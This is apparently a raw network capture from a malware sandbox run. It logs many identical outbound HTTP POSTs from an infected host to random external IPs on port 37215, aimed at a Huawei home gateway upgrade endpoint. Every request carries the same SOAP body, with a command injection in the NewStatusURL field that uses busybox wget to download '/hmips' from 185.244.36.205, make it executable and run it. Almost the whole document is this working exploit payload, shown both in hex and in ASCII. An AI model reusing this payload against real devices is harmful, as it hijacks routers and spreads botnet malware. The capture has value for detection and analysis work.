                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2004192.168.2.1545324181.112.168.10737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.101958990 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2005192.168.2.1558564181.218.53.16837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.101960897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2006192.168.2.1556506122.185.167.25237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.101999044 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2007192.168.2.154004237.45.112.2237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102116108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2008192.168.2.153735445.192.169.11737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102158070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2009192.168.2.1537504197.141.114.6537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102163076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2010192.168.2.153982894.18.4.17837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102166891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2011192.168.2.154329094.85.195.21737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102195978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2012192.168.2.153285694.125.220.18937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102200985 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2013192.168.2.1548738190.64.77.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102226973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
